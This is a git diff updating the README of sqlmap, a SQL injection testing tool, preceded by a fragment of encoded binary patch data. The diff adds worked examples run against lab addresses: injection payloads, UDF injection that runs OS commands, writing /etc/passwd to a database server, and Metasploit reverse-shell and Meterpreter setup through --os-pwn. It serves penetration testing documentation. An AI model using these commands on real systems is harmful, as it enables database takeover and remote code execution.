z!Fo)ldSNgJYIJ9v22t0<432Ew?1D8o*Kn^$0kQu&C6<@c>7;lyeb=QaxS(fC43Gli?+t<&r{dlAALnxYKp%0T(-wo7$QoT0hq!1pXx@u384UV?
zXs*j-i0knr7f8xJd@@dDb+=7!9^!zuJpsjVHA7R3&_VK0^YlJ|&&~7oS_&HK0}%mO
z?Dfh#0jg776iKrabR!-8fTt0-EGB%pLybF
zlcv{l2Y<0HN#gWYPm||N2}D$v&}3a*zldT`?;W2{zU*>uf-y6SD~9H6PI%d=c%ZbTDc3r8x|
z^ja<^F+5$evM!B5(bak8+>S9v>pTJ$W~?oO!OLWrtfOp77Gaxs!^CUg@%ov7=*asiYYgw`=0a+QbQ>PS|
z3k>=OmC+41QgHm2JX1Sidl~b{nA8f)nMVQ<4UP|8)%9=?q7EVE%q^0TF=x`op`%XP
z9|8k*<}nRF4P>ghMdvg24F&*1JHcFJPzpku45L;>dUYRO<=&e4m1Xzz~Iz!mR@BYj$3)*S$ZF6DMYIh?6_9%^l%V>uw^G@I19E0qn~m5dhCHE)K7c&>Lspo_Nb@cv_=
zG0M488sqo40tGP_>ILEJ8qviDfiF-mheb+5HRX&oLyUm$O;Y_z{F8~?tvASxrv@-Y
zuo!tnLK(ow-Kw{jL4VWp(uANIqa)7CtSp~uky94H7H3MdO+`c+(ZgCf`Ch3$CDL5v
z)Gbr}2&zaMD3k$QI)E4|bRLQ$#BgcKfDE0CNxMw0mIwaHR5#q@j1JjXS6I0_UfnyM
zTMh%SF=EJ)jv15>V@EI!4n^qbLNU;{4tk63SU_8f8LL_futvw2{Pnek5aO94ebo=U
zhjBcHytJ+Y5a@3l1SQXK;*w|ZVR=YE6IWE6OF$HNBylV_M&t~6nE!NaVW~Do2UF5l
zI&{_8+LF%8*MW2AlVdbygE>(kvV0UOrAG*m#|3Iyd#phN{TyfWHF;0>*SXB
z02BS@d1bieBjl^%KYF+(`F*`Vp~mFEl$`axJ!&`m0*Rc;ccxk&t%
zbrRzOI}L?+75(@JHztwbI;_BYIbuMJy6h5tH_70nKwUNeY)|;C-XNzQjLO&`b#BMj
zHp}7h*LM!Wnz4Xm$?U((F((N0l@79u6^x;&t9(J?;Lz=$36qv@$Wh?6NpKU+dy
z!T59yGRh61P0o`lj$seSUXL9?LnI=zZggicr43R*__Qv;%it|z*%76oI7QCVL6_A%
z%`y(%m>KMy!Rc4XfW8`ZE{-2jp9EB;AnkLO4zidbr^d11=@`cvV5k_hXGmz+PmNtl
z+?WY8OUKyuxQcb#42R|s4)rNXnX)T#mqA+4B@MwmPF#?p7>wUvI`|t6z6Ap?b|eRI
zbZ;U0B66h;AV-_^4T;qtM^%^jhrc1cYLy8eGN2|>%MdTHR~WmVnahp&lYL;3)iKC<
zd7@GEjv<^nF(v5CzykMD1WjXV5hBh87nhr-u8ozyeM}P*=dPoG>cHC43)X=018BLiF9_Mz{b1WsL}54>dh5e3Ks
z#sVD}R;w{$7OR073_(W6NCUdqfUVHumu0F0t`S2HK@%|-QU*Oi0}zg9j1CfD>?YJ^
zP3cB;kY;Heg?PJlXFiWhv99%w@kQ&a8U@3kAH=L00#ywNPz}5gK+6aMtMVt
zp|N9}H}n%}U)QG-9_ojL`KkkPdj^vr3{SU=B9fZoA`xpQ&_pfiYX<+azJO)8o2h+C
zyS%=*xIM>PH2yxuux^+NIQ?R*8LpZ&79nyp)2{eW8DYSFZ%{K-AVZQv_cA+9o6r(^Usz)D86Wyo-VAlzC?fCp1ji0F#&@_p-kN&U{yO
zAO_Jy7r`+G7G$WiHYK?H4Py&FB(q#9W>7~?53}U-2LDCYB>2%pAtYEQNVs_o;TrkF
zoF)W#xjp6j_qP+iD?{(#rd>m#kuDgcW7C0)7HJYGA~u6lto9!TIXk9dfoM-dy5)45
zVUv^*);gg{6Ih`02pQs~PiH#Hoqqau!nSSL8adx*2piaWjj3ZV8KPMl1nOK7SH9!K
zV*Eb(kxBF@MS0GtWDw6_Ee9SV%W)
z;ZrpZdd&a<)sUC=>XylW_$dvs2@ktL&7fN*TK~l?
zz)evG)yoivnkx+<|KVacL@Bf+VK;=eQ$6pIGa|%013K
zD>^xqH&5w2ojjD<9B5?6s73}bNCcWdKsh6j1g8TNpbrEtWvm%2sqVh7QnvazM3E82
z1KE>?u@3HM9Oxv^kQ`(9Y>n-LvaG8)lrs!{tWPWn5_;yuhYGW?&Pgc9sW)wyNY8rk
z4#%y5P%jrV0_WAS>>zs8o+O?!$NDGtpNwGAsSuvAppY&X4CT_sqJU=@dlx5|u1awz
zJDoM5=9rKLs}^RZYpqg3H}@p!hAz$^0dNb7j#k2{3{yoYD3S}+p)?azYr>?(}$K>c8BOx0Dfnw??VpHXmQ!5m;S@+M&a^~oyUqbJg
zU8Pe6=!8KjI76koIbchiWztt8VeDpu*d&ckFy#gJn%piiY1h&LM5i*aAdMrcT!3qE
z(Y!%yi7U!Mm+Az)NGBRnF4xg7Z&=s&I2$dO2!VevZQh%S3D#h;uu0wE%4$V
zU1F|uRRl6_5FdGCfxh7A!=Tw5k2FXuGPv%RAdaf+c3EE)Nnk_N(VrkrPv2trG>p|R
zO&|I{q}
zr()YnMvUMUY-PrlZ;75a{Mr#DrIe(SXBYHsFGEt&>F)Sein|mScR#y(_h`57(M;Fk
tSeIzx?0B?e!T-HTzk-e(D~^%xO5Qel$h8&0dZI!qQn6XHZauqK{6EQ^I@ACF

diff --git a/doc/README.sgml b/doc/README.sgml
index e4aa25ea0..92d02520b 100644
--- a/doc/README.sgml
+++ b/doc/README.sgml
@@ -35,7 +35,7 @@ requires the Python interpreter version equal or above to 2.5.
 The interpreter is freely downloadable from its
 .
 To make it even easier, many GNU/Linux distributions come out of the box
-with Python interpreter installed and other Unices and MacOS X too provide
+with Python interpreter installed and other Unices and Mac OSX too provide
 it packaged in their formats and ready to be installed.
 Windows users can download and install the Python setup-ready installer
 for x86, AMD64 and Itanium too.
@@ -61,8 +61,9 @@ history support functionalities in the SQL shell and OS shell.
 Note that these functionalities are available natively by Python standard
 
 library on other operating systems.
-You can also choose to install 
-library to speed up the sqlmap algorithmic operations.
+
+You can also choose to install  library to speed up the sqlmap algorithmic operations.
 
 
 Scenario
@@ -192,6 +193,14 @@ execution depending on the underlying back-end database management system
 and the session user privileges.
 
 
+Demo
+
+
        
+You can watch several demo videos, they are hosted on  and linked
+from .
+
 
 Features
 
@@ -333,11 +342,10 @@ inject it and how to pack the SQL payload accordingly.
 Takeover features
 
 
        
-Some of these techniques are detailed in white paper
+Some of these techniques are detailed in the white paper
  and
-slides  and in the
+slide deck .
 
 
@@ -537,9 +545,9 @@ Options:
     -a USERAGENTSFILE   Load a random HTTP User-Agent header from file
     --referer=REFERER   HTTP Referer header
     --headers=HEADERS   Extra HTTP headers newline separated
-    --auth-type=ATYPE   HTTP Authentication type (Basic, Digest or NTLM)
-    --auth-cred=ACRED   HTTP Authentication credentials (name:password)
-    --auth-cert=ACERT   HTTPs Authentication certificate (key_file,cert_file)
+    --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
+    --auth-cred=ACRED   HTTP authentication credentials (name:password)
+    --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
     --proxy=PROXY       Use a HTTP proxy to connect to the target url
     --ignore-proxy      Ignore system default HTTP proxy
     --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
@@ -679,7 +687,7 @@ Example on a MySQL 5.0.67 target (verbosity level 1):
 
 $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1
 
-[hh:mm:58] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/172.16.213.131/session' as session file
+[hh:mm:58] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
 [hh:mm:58] [INFO] testing connection to the target url
 [hh:mm:58] [INFO] testing if the url is stable, wait a few seconds
 [hh:mm:59] [INFO] url is stable
@@ -716,7 +724,7 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 2
 [hh:mm:22] [DEBUG] setting the HTTP method to GET
 [hh:mm:22] [DEBUG] creating HTTP requests opener object
 [hh:mm:22] [DEBUG] parsing XML queries file
-[hh:mm:22] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/172.16.213.131/session' as session file
+[hh:mm:22] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
 [hh:mm:22] [INFO] testing connection to the target url
 [hh:mm:22] [INFO] testing if the url is stable, wait a few seconds
 [hh:mm:23] [INFO] url is stable
@@ -756,7 +764,7 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 3
 [hh:mm:53] [DEBUG] setting the HTTP method to GET
 [hh:mm:53] [DEBUG] creating HTTP requests opener object
 [hh:mm:53] [DEBUG] parsing XML queries file
-[hh:mm:53] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/172.16.213.131/session' as session file
+[hh:mm:53] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
 [hh:mm:53] [INFO] testing connection to the target url
 [hh:mm:53] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
@@ -764,7 +772,7 @@ Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
 Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8-rc7 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.8
 Connection: close
 [...]
 [hh:mm:54] [INFO] testing MySQL
@@ -774,7 +782,7 @@ Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
 Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8-rc7 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.8
 Connection: close
 [...]
 
@@ -793,7 +801,7 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 4
 [hh:mm:20] [DEBUG] setting the HTTP method to GET
 [hh:mm:20] [DEBUG] creating HTTP requests opener object
 [hh:mm:20] [DEBUG] parsing XML queries file
-[hh:mm:20] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/172.16.213.131/session' as session file
+[hh:mm:20] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
 [hh:mm:20] [INFO] testing connection to the target url
 [hh:mm:20] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
@@ -801,7 +809,7 @@ Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
 Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8-rc7 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.8
 Connection: close
 
 [hh:mm:20] [TRAFFIC IN] HTTP response (OK - 200):
@@ -828,7 +836,7 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 5
 [hh:mm:47] [DEBUG] setting the HTTP method to GET
 [hh:mm:47] [DEBUG] creating HTTP requests opener object
 [hh:mm:47] [DEBUG] parsing XML queries file
-[hh:mm:47] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/172.16.213.131/session' as session file
+[hh:mm:47] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
 [hh:mm:47] [INFO] testing connection to the target url
 [hh:mm:47] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
@@ -836,7 +844,7 @@ Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
 Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8-rc7 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.8
 Connection: close
 
 [hh:mm:47] [TRAFFIC IN] HTTP response (OK - 200):
@@ -1118,7 +1126,7 @@ back-end DBMS:    Oracle
 HTTP Cookie header
 
 
        
-Options: --cookie, --drop-set-cookie and --cookie-urlencode
+Options: --cookie, --cookie-urlencode and --drop-set-cookie
 
 
        
 This feature can be useful in two scenarios:
@@ -1370,7 +1378,7 @@ to provide them from the configuration INI file. Have a look at the sample
 sqlmap.conf file.
 
 
-HTTPs Basic, Digest and NTLM authentications
+HTTP Basic, Digest and NTLM authentications
 
 
        
 Options: --auth-type and --auth-cred
@@ -1426,7 +1434,7 @@ Connection: close
 
 
 
-HTTPs Certificate authentication
+HTTP Certificate authentication
 
 
        
 Option: --auth-cert
@@ -1450,7 +1458,7 @@ $ python sqlmap.py -u "http://www.example.com/process.php?id=1" \
 HTTP proxy
 
 
        
-Option: --proxy
+Option: --proxy and --ignore-proxy
 
 
        
 It is possible to provide an anonymous HTTP proxy address to pass by the
@@ -1487,15 +1495,10 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
 Note that 8118 is the default Privoxy port, adapt it to your
 settings.
 
-
-Ignoring system default HTTP proxy
-
 
        
-Option: --ignore-proxy
-
-This option should be used in cases like when you want to run sqlmap
-against the machine inside a local area network skipping default
-usage of a system-wide set HTTP proxy server.
+The option --ignore-proxy should be used in cases like
+when you want to run sqlmap against the machine inside a local area
+network skipping default usage of a system-wide set HTTP proxy server.
 
 
 Concurrent HTTP requests
@@ -2102,7 +2105,7 @@ stacked queries support:    'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
 Example on a Microsoft SQL Server 2005 Service Pack 0 target:
 
 
-$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
+$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" \
   --stacked-test -v 1
 
 [...]
@@ -2165,7 +2168,7 @@ time based blind sql injection payload:    'id=1; SELECT pg_sleep(5);-- AND 9644
 Example on a Microsoft SQL Server 2005 Service Pack 0 target:
 
 
-$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
+$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" \
   --time-test -v 1
 
 [...]
@@ -2240,7 +2243,7 @@ back-end DBMS: PostgreSQL
 [hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause 
 bruteforcing technique
 [hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.1.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 
+valid union:    'http://172.16.213.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 
 1262=1262'
 
 
@@ -2559,7 +2562,7 @@ back-end DBMS:	active fingerprint: Microsoft SQL Server 2000
 Example on a Microsoft SQL Server 2005 Service Pack 0 target:
 
 
-$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
+$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 1 -f
 
 [...]
 [hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
@@ -2649,7 +2652,7 @@ back-end DBMS:	active fingerprint: Microsoft SQL Server 2000
 Example on a Microsoft SQL Server 2005 Service Pack 0 target:
 
 
-$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 2 -f -b
+$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 2 -f -b
 
 [...]
 [hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
@@ -2750,7 +2753,7 @@ Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
 Example on a Microsoft SQL Server 2005 Service Pack 0 target:
 
 
-$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
+$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 0 -b
 
 banner:
 ---
@@ -3518,15 +3521,15 @@ which table(s) of database 'testdb'?
 [s]kip
 [q]uit
 > 
-[19:18:23] [INFO] fetching columns 'surname' entries for table 'users' on 
+[hh:mm:23] [INFO] fetching columns 'surname' entries for table 'users' on 
 database 'testdb'
-[19:18:23] [INFO] fetching number of columns 'surname' entries for table 
+[hh:mm:23] [INFO] fetching number of columns 'surname' entries for table 
 'users' on database 'testdb'
-[19:18:23] [INFO] retrieved: 4
-[19:18:23] [INFO] retrieved: blissett
-[19:18:23] [INFO] retrieved: bunny
-[19:18:23] [INFO] retrieved: ming
-[19:18:23] [INFO] retrieved: nameisnull
+[hh:mm:23] [INFO] retrieved: 4
+[hh:mm:23] [INFO] retrieved: blissett
+[hh:mm:23] [INFO] retrieved: bunny
+[hh:mm:23] [INFO] retrieved: ming
+[hh:mm:23] [INFO] retrieved: nameisnull
 Database: testdb
 Table: users
 [4 entries]
@@ -3566,7 +3569,7 @@ Table: users
 | 5  |                                              | nameisnull        |
 +----+----------------------------------------------+-------------------+
 
-[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/
+[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/home/inquis/sqlmap/output/
 172.16.213.131/dump/public/users.csv'
 [...]
 
@@ -3742,7 +3745,7 @@ considered a system database because some database administrators use it
 as a users' database.
 
 
-Execute your SQL statement
+Execute custom SQL statement
 
 
        
 Options: --sql-query and --sql-shell
@@ -4124,8 +4127,51 @@ support when the back-end DBMS is PostgreSQL.
 
 
        
 Options: --udf-inject and --shared-lib
-#TODO
 
+
        
+You can inject your own user-defined functions (UDFs) by compiling a
+MySQL or PostgreSQL shared library, DLL for Windows and shared object for
+Linux/Unix, then provide sqlmap with the path where the shared library
+is stored locally on your machine. sqlmap will then ask you some
+questions, upload the shared library on the database server file system,
+create the user-defined function(s) from it and, depending on your
+options, execute them. When you are finished using the injected UDFs,
+sqlmap can also remove them from the database for you.
+
+
        
+Example on a PostgreSQL 8.4:
+
+
+$ python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
+
+[...]
+web application technology: PHP 5.2.6, Apache 2.2.9
+back-end DBMS: PostgreSQL
+
+which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
+how many user-defined functions do you want to create from the shared library? 1
+what is the name of the UDF number 1? sys_eval
+how many input parameters takes UDF 'sys_eval'? (default: 1) 
+what is the data-type of input parameter number 1? (default: text) 
+what is the data-type of the return value? (default: text) 
+do you want to call your injected user-defined functions now? [Y/n/q] y
+which UDF do you want to call?
+[1] sys_eval
+[q] Quit
+> 1
+what is the value of the parameter number 1 (data-type: text)? echo test
+do you want to retrieve the return value of the UDF? [Y/n] 
+return value:    'test'
+
+do you want to call this or another injected UDF? [Y/n] n
+do you want to remove UDF 'sys_eval'? [Y/n] 
+[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only 
+be deleted manually
+
+
+
        
+If you want, you can specify the shared library local file system path
+via command line using --shared-lib option.
 
 File system access
 
@@ -4141,11 +4187,12 @@ PostgreSQL or Microsoft SQL Server, and the session user has the needed
 privileges to abuse database specific functionalities and architectural
 weaknesses.
 The file specified can be either a text or a binary file. sqlmap will
-handle either cases automatically.
+handle it automatically.
 
 
        
-These techniques are detailed in white paper
-.
+These techniques are detailed in the white paper
+.
 
 
        
 Example on a PostgreSQL 8.3.5 target to retrieve a text file:
@@ -4258,16 +4305,17 @@ output/172.16.213.131/files/C__example.exe: PE32 executable for MS Windows (GUI)
 Options: --write-file and --dest-file
 
 
        
-It is possible to upload a local file to the underlying file system when
-the back-end database management system is either MySQL, PostgreSQL or
-Microsoft SQL Server, and the session user has the needed privileges to
+It is possible to upload a local file to the database server file system
+when the back-end database management system is either MySQL, PostgreSQL
+or Microsoft SQL Server, and the session user has the needed privileges to
 abuse database specific functionalities and architectural weaknesses.
 The file specified can be either a text or a binary file. sqlmap will
-handle either cases automatically.
+handle it automatically.
 
 
        
-These techniques are detailed in white paper
-.
+These techniques are detailed in the white paper
+.
 
 
        
 Example on a MySQL 5.0.67 target to upload a binary UPX-compressed
@@ -4303,6 +4351,32 @@ written on the back-end DBMS file system? [Y/n] y
 same size as the local file '/tmp/nc.exe.packed'
 
 
+
        
+Example on a PostgreSQL 8.4 target to upload a text file:
+
+
+$ python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 \
+  --write-file /etc/passwd --dest-file /tmp/writtenfrompgsql -v 1
+
+[...]
+web application technology: PHP 5.2.6, Apache 2.2.9
+back-end DBMS: PostgreSQL
+
+[hh:mm:01] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:01] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:01] [INFO] retrieved: 8.4.2
+[hh:mm:07] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:07] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:07] [INFO] retrieved: 0
+[hh:mm:07] [INFO] retrieved: 0
+[hh:mm:07] [INFO] the back-end DBMS operating system is Linux
+do you want confirmation that the file '/tmp/writtenfrompgsql' has been successfully 
+written on the back-end DBMS file system? [Y/n] 
+[hh:mm:14] [INFO] retrieved: 2264
+[hh:mm:14] [INFO] the file has been successfully written and its size is 2264 bytes, 
+same size as the local file '/etc/passwd'
+
+
 
 Operating system access
 
@@ -4320,24 +4394,25 @@ weaknesses.
 
 
        
 On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality
-demonstrated above) a shared library (binary file) containing two
+explained above) a shared library (binary file) containing two
 user-defined functions, sys_exec() and sys_eval(), then
 it creates these two functions on the database and call one of them to
 execute the specified command, depending on the user's choice to display
 the standard output or not.
 On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored
-procedure: if it's disable sqlmap re-enables it, if it does not exist,
+procedure: if it's disabled, sqlmap re-enables it; if it does not exist,
 sqlmap creates it from scratch.
 
 
        
 If the user wants to retrieve the command standard output, sqlmap will use
 one of the enumeration SQL injection techniques (blind or inband) to
-retrieve it, or in case of stacked query SQL injection technique 
+retrieve it or, in case of stacked query SQL injection technique,
 sqlmap will execute the command without returning anything to the user.
 
 
        
-These techniques are detailed in white paper
-.
+These techniques are detailed in the white paper
+.
 
 
        
 It is possible to specify a single command to be executed with the
@@ -4417,7 +4492,7 @@ nt authority\network service
 
        
 It is also possible to simulate a real shell where you can type as many
 arbitrary commands as you wish. The option is --os-shell and has
-the same TAB completion and history functionalities as provided by
+the same TAB completion and history functionalities like
 --sql-shell.
 
 
        
@@ -4620,7 +4695,7 @@ Ethernet adapter Local Area Connection 2:
    Connection-specific DNS Suffix  . : localdomain
    IP Address. . . . . . . . . . . . : 172.16.213.131
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
----Default Gateway . . . . . . . . . : 192.168.1.1
+---Default Gateway . . . . . . . . . : 172.16.213.1
 
 os-shell> exit
 [hh:mm:41] [INFO] cleaning up the database management system
@@ -4640,107 +4715,121 @@ user-defined functions are already created, if so, it asks the user if he
 wants to recreate them or keep them and save time.
 
 
-Prompt for an out-of-band shell, meterpreter or VNC
+Prompt for an out-of-band shell, Meterpreter or VNC
 
 
        
 Options: --os-pwn, --priv-esc, --msf-path and --tmp-path
 
 
        
-It is possible to establish an out-of-band TCP stateful channel
-between the attacker and the underlying operating system by using the
-exploited SQL injection as a stepping stone. This is implemented for MySQL,
-PostgreSQL and Microsoft SQL Server.
-sqlmap relies on the  to perform this attack, so you need to have it already
-on your system - it's free and can be downloaded from the homepage. It is
-required to use Metasploit Framework version 3.3.3 or above.
+It is possible to establish an out-of-band stateful TCP connection
+between the user machine and the database server underlying operating
+system. This channel can be an interactive command prompt, a Meterpreter
+session or a graphical user interface (VNC) session as per user's choice.
+sqlmap relies on Metasploit to create the shellcode and implements four
+different techniques to execute it on the database server. These
+techniques are:
+
+Database in-memory execution of the Metasploit's shellcode
+via sqlmap own user-defined function sys_bineval(). Supported on
+MySQL and PostgreSQL.
+Upload and execution of a Metasploit's stand-alone payload
+stager via sqlmap own user-defined function sys_exec() on
+MySQL and PostgreSQL or via xp_cmdshell() on Microsoft SQL
+Server.
+Execution of Metasploit's shellcode by performing a SMB
+reflection attack () with a UNC path request from the database server to
+the user's machine where the Metasploit smb_relay server exploit
+runs.
+Database in-memory execution of the Metasploit's shellcode by
+exploiting Microsoft SQL Server 2000 and 2005
+sp_replwritetovarbin stored procedure heap-based buffer
+overflow () with automatic DEP bypass.
+
 
 
        
 Note that this feature is not supported by sqlmap running on Windows
-because Metasploit's msfconsole and msfcli are not supported on the native
-Windows Ruby interpreter.
+because it relies on Metasploit's msfcli which is not
+available for Windows.
 
 
        
-These techniques are detailed in white paper
-.
+These techniques are detailed in the white paper
+ and in the
+slide deck .
 
 
        
-Example on a MySQL 5.0.67 target:
+Example on a MySQL 5.1 target:
 
 
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" \
+$ python sqlmap.py -u "http://172.16.213.128/sqlmap/mysql/get_int_51.aspx?id=1" \
   --os-pwn -v 1 --msf-path /home/inquis/software/metasploit
 
 [...]
-[hh:mm:17] [INFO] the back-end DBMS is MySQL
 web server operating system: Windows 2003 or 2008
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
 back-end DBMS: MySQL >= 5.0.0
 
-[hh:mm:17] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:17] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:17] [INFO] retrieved: 5.0.67
-[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:23] [INFO] retrieved: C
-[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:23] [INFO] testing if current user is DBA
-[hh:mm:23] [INFO] retrieved: 1
-[hh:mm:23] [INFO] checking if sys_exec UDF already exist
-[hh:mm:23] [INFO] retrieved: 1
-[hh:mm:24] [INFO] sys_exec UDF already exists, do you want to overwrite it? [y/N] N
-[hh:mm:24] [INFO] checking if sys_eval UDF already exist
-[hh:mm:24] [INFO] retrieved: 1
-[hh:mm:24] [INFO] sys_eval UDF already exists, do you want to overwrite it? [y/N] N
-[hh:mm:24] [INFO] creating Metasploit Framework 3 payload stager
-[hh:mm:24] [INFO] which connection type do you want to use?
-[1] Bind TCP (default)
-[2] Bind TCP (No NX)
-[3] Reverse TCP
-[4] Reverse TCP (No NX)
+[hh:mm:09] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:09] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:09] [INFO] retrieved: 5.1.30
+[hh:mm:18] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:18] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:18] [INFO] retrieved: C
+[hh:mm:19] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:19] [INFO] testing if current user is DBA
+[hh:mm:19] [INFO] retrieved: 1
+[hh:mm:20] [INFO] checking if UDF 'sys_bineval' already exist
+[hh:mm:20] [INFO] retrieved: 0
+[hh:mm:21] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:21] [INFO] retrieved: 0
+[hh:mm:21] [INFO] retrieving MySQL base directory absolute path
+[hh:mm:21] [INFO] retrieved: C:\Program Files\MySQL\MySQL Server 5.1\
+[hh:mm:46] [WARNING] this will only work if the database administrator created manually 
+the 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin' subfolder
+[hh:mm:47] [INFO] creating UDF 'sys_bineval' from the binary UDF file
+[hh:mm:47] [INFO] creating UDF 'sys_exec' from the binary UDF file
+how do you want to execute the Metasploit shellcode on the back-end database underlying 
+operating system?
+[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
+[2] Stand-alone payload stager (file system way)
 > 1
-[hh:mm:24] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131
-[hh:mm:24] [INFO] which remote port numer do you want to use? [61588] 61588
-[hh:mm:24] [INFO] which payload do you want to use?
-[1] Reflective Meterpreter (default)
-[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
-[3] Shell
-[4] Reflective VNC
-[5] PatchUp VNC (only from Metasploit development revision 6742)
+[hh:mm:51] [INFO] creating Metasploit Framework 3 multi-stage shellcode 
+which connection type do you want to use?
+[1] Reverse TCP: Connect back from the database host to this machine (default)
+[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
+between the specified and 65535
+[3] Bind TCP: Listen on the database host for a connection
 > 1
-[hh:mm:24] [INFO] which payload encoding do you want to use?
-[1] No Encoder
-[2] Alpha2 Alphanumeric Mixedcase Encoder
-[3] Alpha2 Alphanumeric Uppercase Encoder
-[4] Avoid UTF8/tolower
-[5] Call+4 Dword XOR Encoder
-[6] Single-byte XOR Countdown Encoder
-[7] Variable-length Fnstenv/mov Dword XOR Encoder
-[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
-[9] Non-Alpha Encoder
-[10] Non-Upper Encoder
-[11] Polymorphic XOR Additive Feedback Encoder (default)
-[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
-[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
-> 11
-[hh:mm:24] [INFO] creation in progress .................. done
-[hh:mm:42] [INFO] compression in progress . quit unexpectedly with return code 1
